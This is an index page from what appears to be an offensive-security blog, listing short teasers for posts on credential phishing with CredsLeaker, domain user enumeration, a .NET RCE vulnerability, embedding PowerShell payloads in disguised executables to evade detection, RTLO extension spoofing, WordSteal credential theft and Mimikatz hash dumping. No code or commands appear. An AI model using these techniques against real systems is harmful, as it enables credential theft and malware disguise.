Phish domain user credentials with CredsLeaker with Powershell

CredsLeaker is a powershell script that phishes information from the user. It will popup a user authentication box – The script will check the details against the domain controller until it has valid credentials.  Normally this screen is pretty common in a domain scenario and the user may have seen this box before. Once CredsLeaker … Read morePhish domain user credentials with CredsLeaker with Powershell

Enumerate usernames on a domain with no permissions

RidRelay is a python script to enumerate usernames on a domain where you have no permissions at all. It is a quick and easy way to get domain usernames while on an internal network. RidRelay combines the SMB Relay attack, common lsarpc based queries and RID cycling to get a list of domain usernames. It … Read moreEnumerate usernames on a domain with no permissions

Microsoft CVE-2017-8759: .NET Framework Remote Code Execution Vulnerability

A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts … Read moreMicrosoft CVE-2017-8759: .NET Framework Remote Code Execution Vulnerability

Silently execute a PowerShell script with a C# application

One way of avoiding detection of your payloads is to embed your Powershell payload into a semi-legitimate executable. You can create an executable that for example, would launch Microsoft Office or Google Chrome and use the exact same icon. Using this method, you can act as a middle-man. Upon execution of the application it would … Read moreSilently execute a PowerShell script with a C# application

Spoofing file extensions with the Unicode Character ‘RIGHT-TO-LEFT OVERRIDE’ (U+202E)

One of the more interesting things Windows does is support for Right-To-Left characters. This can be a useful tool to hide the real file extension of a document. By simply inserting the unicode character U+202E you can partially reverse the file name of a document and hide it’s real extension. This website allows you to … Read moreSpoofing file extensions with the Unicode Character ‘RIGHT-TO-LEFT OVERRIDE’ (U+202E)

Remotely stealing windows credentials with WordSteal

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature but was found used by malware creators to include images through http for statistics. We can also include remote files to a SMB server and the victim will authenticate with his logins credentials. This is very useful during a … Read moreRemotely stealing windows credentials with WordSteal

Retrieve domain password hashes with Mimikatz

Mimikatz is a windows security tool that can be used to extract passwords from Windows/Windows Servers. One way of doing this manually is extracting the information from the NTDS.DIT file, which is the Active Directory database. This can be tricky to extract, as it’s current open and generally inaccessible whilst the server is running. This … Read moreRetrieve domain password hashes with Mimikatz